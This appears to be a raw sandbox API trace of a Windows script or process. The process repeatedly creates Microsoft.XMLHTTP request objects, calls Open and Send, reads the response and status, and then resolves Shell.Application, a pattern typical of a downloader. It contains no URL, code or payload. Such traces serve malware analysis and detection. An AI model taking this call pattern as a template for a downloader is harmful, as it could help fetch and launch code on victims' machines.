	[0324.664] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7290, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7290) returned 0x0
	[0324.664] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7290) returned 0x3
	[0324.664] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7290, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0324.664] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7290, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0324.667] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7290, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0324.667] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0324.667] SysStringLen (param_1=0x0) returned 0x0
	[0324.667] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0324.670] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0324.670] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74e0) returned 0x0
	[0324.670] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0324.670] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7548) returned 0x0
	[0324.670] ??2@YAPEAX_K@Z () returned 0x62f330
	[0324.670] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7548, pUnkSite=0x62f330) 
	[0324.671] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0324.671] XMLHTTPRequest:IUnknown:Release (This=0x49c7548) returned 0x0
	[0324.671] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74e0) returned 0x0
	[0324.671] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74e0) returned 0x3
	[0324.671] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0324.671] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0324.671] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0324.671] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0324.671] SysStringLen (param_1=0x0) returned 0x0
	[0324.671] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0324.672] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0324.672] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0324.672] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0324.672] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0324.672] ??2@YAPEAX_K@Z () returned 0x62f310
	[0324.672] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0324.672] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0324.672] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0324.672] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0324.672] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0324.672] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0324.672] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0324.672] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0324.672] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0324.672] SysStringLen (param_1=0x0) returned 0x0
	[0324.672] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0324.673] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0324.673] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7260) returned 0x0
	[0324.673] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0324.673] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72c8) returned 0x0
	[0324.673] ??2@YAPEAX_K@Z () returned 0x62f330
	[0324.673] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72c8, pUnkSite=0x62f330) 
	[0324.673] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0324.673] XMLHTTPRequest:IUnknown:Release (This=0x49c72c8) returned 0x0
	[0324.673] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7260) returned 0x0
	[0324.673] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7260) returned 0x3
	[0324.673] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0324.673] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7260, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0324.673] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0324.673] longjmp () 
	[0324.673] longjmp () 
	[0324.673] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0324.673] SysStringLen (param_1=0x0) returned 0x0
	[0324.673] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0324.674] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0324.674] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0324.674] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0324.674] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7578) returned 0x0
	[0324.674] ??2@YAPEAX_K@Z () returned 0x62f310
	[0324.674] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7578, pUnkSite=0x62f310) 
	[0324.674] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0324.674] XMLHTTPRequest:IUnknown:Release (This=0x49c7578) returned 0x0
	[0324.674] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0324.674] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0324.674] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0324.674] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0324.674] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0324.674] longjmp () 
	[0324.675] longjmp () 
	[0324.675] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0324.675] SysStringLen (param_1=0x0) returned 0x0
	[0324.675] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0324.675] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0324.675] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74e0) returned 0x0
	[0324.675] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0324.675] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0324.675] ??2@YAPEAX_K@Z () returned 0x62f330
	[0324.675] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0324.675] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0324.675] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0324.675] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74e0) returned 0x0
	[0324.675] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74e0) returned 0x3
	[0324.675] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0324.675] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0324.675] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0324.676] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0324.676] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0324.676] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0324.841] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0324.841] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0324.841] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0324.841] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0324.842] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0324.842] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0324.842] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0324.842] SysStringLen (param_1=0x0) returned 0x0
